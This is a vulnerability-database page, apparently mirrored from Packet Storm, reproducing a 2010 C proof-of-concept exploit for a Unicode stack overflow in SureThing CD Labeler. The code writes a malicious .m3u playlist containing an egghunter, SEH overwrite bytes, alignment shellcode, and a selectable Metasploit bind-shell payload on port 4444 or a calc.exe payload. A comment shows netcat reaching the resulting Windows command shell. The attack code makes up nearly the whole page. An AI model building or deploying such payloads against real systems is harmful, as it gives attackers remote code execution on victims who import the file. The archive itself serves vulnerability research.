Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SureThing CD Labeler Stack Overflow

🗓️ 09 Jun 2010 00:00:00Reported by mr_meType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

SureThing CD Labeler stack overflow PoC exploit, found by Ruben Alejandro. This script creates a malicious .m3u file that triggers a stack overflow when imported into SureThing CD Labeler application, enabling remote code execution

Code
`/*  
surethingcdlabelerbofpoc.c  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SureThing cd labeler (m3u/pls) - unicode stack overflow PoC exploit  
Found by: Ruben Alejandro - chap0  
Author: Steven Seeley - mr_me (http://net-ninja.net/)  
Greetz to: Corelan Security Team  
http://www.corelan.be:8800/index.php/security/corelan-team-members/  
Writeup: Unicode, the magic of exploiting 0x00410041 (https://net-ninja.net/blog/?p=71)  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Script provided 'as is', without any warranty.  
Use for educational purposes only.  
Do not use this code to do anything illegal !  
  
Note : you are not allowed to edit/modify this code.  
If you do, Corelan cannot be held responsible for any damages this may cause.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
usage:  
Compile this with lcc-win32 and execute it choosing your shellcode to create the .m3u file.  
Then click on 'playlists' --> 'Import Playlist from Hard Drive' -->  
'Import playlist from a file on my computer' --> for filetype select 'Generic m3u/pls file'  
--> open evil m3u file --> boom.  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
mrme@backtrack:~$ nc -v 192.168.2.5 4444  
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out  
(UNKNOWN) [192.168.2.5] 4444 (?) open  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\>  
*/  
  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
  
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum  
http://metasploit.com */  
  
unsigned char bind[] =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"  
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"  
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"  
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"  
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"  
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"  
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"  
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"  
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"  
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"  
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"  
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"  
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"  
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"  
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"  
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"  
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"  
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"  
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"  
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"  
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"  
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"  
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"  
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"  
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"  
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"  
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"  
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"  
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"  
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"  
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"  
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"  
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"  
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"  
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"  
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"  
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"  
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"  
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"  
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"  
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";  
  
unsigned char calc[] =  
"\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"  
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"  
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"  
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"  
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"  
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"  
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"  
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"  
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"  
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"  
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"  
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"  
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"  
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"  
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"  
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"  
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"  
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"  
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"  
"\x50\x41\x41";  
  
// unicode encoded egghunter  
unsigned char egghunter[] =  
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"  
"1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"  
"AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"  
"O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA";  
  
// venetian shellcode  
unsigned char getAddressAndAlignEaxThenJmp[] =  
"\x58\x6d\x58\x6d\x58\x6d\x58\x6d\x05\x02\x22\x6d\x2d\x02\x11\x6d"  
"\x2d\x02\x11\x6d\x50\x6d\xc3";  
  
unsigned char tag[] = "\x77\x30\x30\x74\x77\x30\x30\x74";  
  
int main ( int argc , char * argv[])  
{  
FILE* expfle = NULL;  
char* SEH = "\x72\x73"; // CALL DWORD PTR SS:[EBP-4] from dwwin.dll  
char* NSEH = "\x41\x6d"; int i;  
  
printf("\n***************************************************************************\n");  
printf("\tSureThing CD Labeler Unicode stack overflow PoC Exploit\n");  
printf("\tFound by: Ruben Alejandro - chap0\n");  
printf("\tCode by: Steven Seeley - mr_me\n");  
printf("\thttp://www.net-ninja.net/\n");  
printf("***************************************************************************\n");  
  
if( (expfle=fopen("cst-surethingcdlabeler.m3u","wb")) ==NULL )  
{  
perror("\n[-] Cannot create the exploit file..");  
exit(0);  
}  
  
for (i=0; i<8; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
fwrite(egghunter, sizeof(egghunter)-1, 1, expfle); // egghunter  
  
for (i=0; i<62; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
fwrite(nseh, sizeof(nseh)-1, 1, expfle); // nseh - walk  
fwrite(seh, sizeof(seh)-1, 1, expfle); // seh - unicode friendly  
fwrite(getAddressAndAlignEaxThenJmp, // custom unicode shellcode  
sizeof(getAddressAndAlignEaxThenJmp)-1, 1, expfle);  
  
for (i=0; i<405; i++)  
{  
fwrite("\x41", 1, 1, expfle); // junk  
}  
  
fwrite(tag, sizeof(tag)-1, 1, expfle); // egghunter tag  
  
printf ("\n[+] Enter shellcode option: \n");  
printf ("\n\t1. Bindshell on port 4444");  
printf ("\n\t2. Calc.exe\n");  
scanf ("%d",&i);  
  
if (i == 1){  
fwrite(bind, sizeof(bind)-1, 1, expfle); // bind  
}  
else if (i == 2){  
fwrite(calc, sizeof(calc)-1, 1, expfle); // calc  
}  
  
fclose(expfle);  
printf("\n[+] cst-surethingcdlabeler.m3u created successfully! \r\n");  
  
return 0;  
  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jun 2010 00:00Current
0.4Low risk
Vulners AI Score0.4
surething cd labelerstack overflowpoc exploitruben alejandrounicodem3u fileshellcoderemote code executioncorelan security teamlcc-win32metasploitexploitwindows xpsecurity vulnerability
21